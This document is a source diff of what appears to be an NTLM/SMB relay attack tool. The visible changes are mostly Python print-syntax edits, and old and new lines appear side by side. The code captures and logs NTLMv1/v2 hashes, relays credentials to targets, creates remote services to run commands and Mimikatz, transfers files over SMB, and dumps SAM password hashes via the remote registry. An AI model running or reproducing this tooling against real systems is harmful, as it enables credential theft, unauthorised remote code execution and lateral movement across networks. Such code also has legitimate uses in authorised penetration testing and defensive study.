NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return Username, Domain
return Username, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(Username)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return Username, Domain
return Username, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(Username)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None
#Get the index of the dialect we want. That is NT LM 0.12.
def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
def ExtractSMBChallenge(data, Pivoting):
SSPIStart = data.find('NTLMSSP')
@ -271,7 +271,7 @@ def ExtractSMBChallenge(data, Pivoting):
if Pivoting[0] == "1":
return Challenge
else:
print "[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex")
print ("[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex"))
return Challenge
def ExtractHTTPChallenge(data,Pivoting):
@ -283,7 +283,7 @@ def ExtractHTTPChallenge(data,Pivoting):
if Pivoting[0] == "1":
return Challenge
else:
print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex")
print ("[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex"))
return Challenge
#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target.
@ -296,7 +296,7 @@ def ExtractRawNTLMPacket(data):
#Is this a Guest sessions?
def GetSessionResponseFlags(data):
if data[41:43] == "\x01\x00":
print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
print ("[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful..")
#Keeps our connection alive.
def SMBKeepAlive(s, data):
@ -344,7 +344,7 @@ def FindLocalIp():
IP = s.getsockname()[0]
s.close()
except:
print "It seems like you're not connected to any network.."
print ("It seems like you're not connected to any network..")
IP = '127.0.0.1'
s.close()
return IP
@ -364,7 +364,7 @@ def ConvertToClassC(Host, Class):
Ip[6:7] = ["0"]
return ''.join(Ip)+Class
else:
print "Illegal class, please use: /24 or /16"
print ("Illegal class, please use: /24 or /16")
return None
def GenerateRandomFileName():
@ -510,7 +510,7 @@ def BindCall(UID, Version, File, data, s):
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
print ("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n")
return ModifySMBRetCode(data)
## Fail Handling.
@ -582,14 +582,14 @@ def MimiKatzRPC(Command, f, host, data, s):
#First Packet from output contains the complete len of what's coming, don't print it.
LenOut = len(ExtractRPCCommandOutput(data))
Output = ExtractRPCCommandOutput(data)[12:LenOut-9]
print Output
print (Output)
return data,s,f
##Do large RPC reads..
if data[8:10] == "\x2e\x05":
buffsize = 1024
filesize = struct.unpack('<i', data[96:100])[0]*2
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
dataoffset = 0
start_time = time.time()
##First Packet from output contains the complete len of what's coming, don't print it.
@ -617,10 +617,10 @@ def MimiKatzRPC(Command, f, host, data, s):
Seconds = (time.time() - start_time)
if Seconds>60:
minutes = Seconds/60
print 'Fetched in: %.3g minutes.'%(minutes)
print ('Fetched in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Fetched in: %.3g seconds'%(Seconds)
print "Output:\n", Output
print ('Fetched in: %.3g seconds'%(Seconds))
print ("Output:\n", Output)
return data,s,f
######################################
@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
#print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n"
print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -846,7 +846,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
#print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00")
@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108]
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108]
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n"
print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
data = s.recv(2048)
if data[8:10] == "\x2d\x22":
print "[+] Can't open the file, access is denied (write protected file?)."
print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
##OpenAndX.
if data[8:10] == "\x2d\x34":
print "[+] The command failed or took to long to complete."
print ("[+] The command failed or took to long to complete.")
return data, s
##all good.
@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
data = s.recv(2048)
if data[8:10] == "\xa2\x22":
print "[+] Can't open the file, access is denied (write protected file?)."
print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
if data[8:10] == "\xa2\x35":
print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename
print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename)
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
##OpenAndX.
if data[8:10] == "\xa2\x34":
print "[+] The command failed or took to long to complete."
print ("[+] The command failed or took to long to complete.")
return data, s
##all good.
@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s):
##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520.
first = filesize-65520
@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Downloaded in: %.3g minutes.'%(minutes)
print ('Downloaded in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds)
print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2e\x00":
@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
count = 0
bar = 80
start_time = time.time()
print 'File size: %s'%(GetReadableSize(FileSize))
print ('File size: %s'%(GetReadableSize(FileSize)))
for i in xrange(count_number):
count = count+1
Chunk = FileContent[dataoffset:dataoffset+30000]
@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Uploaded in: %.3g minutes.'%(minutes)
print ('Uploaded in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Uploaded in: %.3g seconds'%(Seconds)
print ('Uploaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2f\x00":
@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s):
##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520.
first = filesize-65520
@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Downloaded in: %.3g minutes.\n'%(minutes)
print ('Downloaded in: %.3g minutes.\n'%(minutes))
if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds)
print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2e\x00":
@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host):
data = s.recv(2048)
if data[8:10] == "\x06\x21":
print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process."
print "[+] Try taskkill /F /IM process_name, then delete the file."
print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.")
print ("[+] Try taskkill /F /IM process_name, then delete the file.")
return data, s
if data[8:10] == "\x06\x34":
print "[+] Delete Failed. File not found."
print ("[+] Delete Failed. File not found.")
return data, s
if data[8:10] == "\x06\x00":
@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC Query Info.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to read the key\n"
print ("[+] Failed to read the key\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC CloseKey.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to close the key\n"
print ("[+] Failed to close the key\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler)
@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData):
Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
for i in range(len(JDSkew1GBGData)):
Key += JDSkew1GBGData[Xored[i]]
print 'BootKey: %s' % Key.encode("hex")
print ('BootKey: %s' % Key.encode("hex"))
return Key
##########Dump Hashes#############
@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..."
print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "Retrying..."
print ("Retrying...")
time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host):
##Error handling.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
##Grab the keys
if data[8:10] == "\x25\x00":
@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host):
Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp")
WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")
except:
print "[+] Live dump failed, is python-crypto installed? "
print ("[+] Live dump failed, is python-crypto installed? ")
pass
print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt"
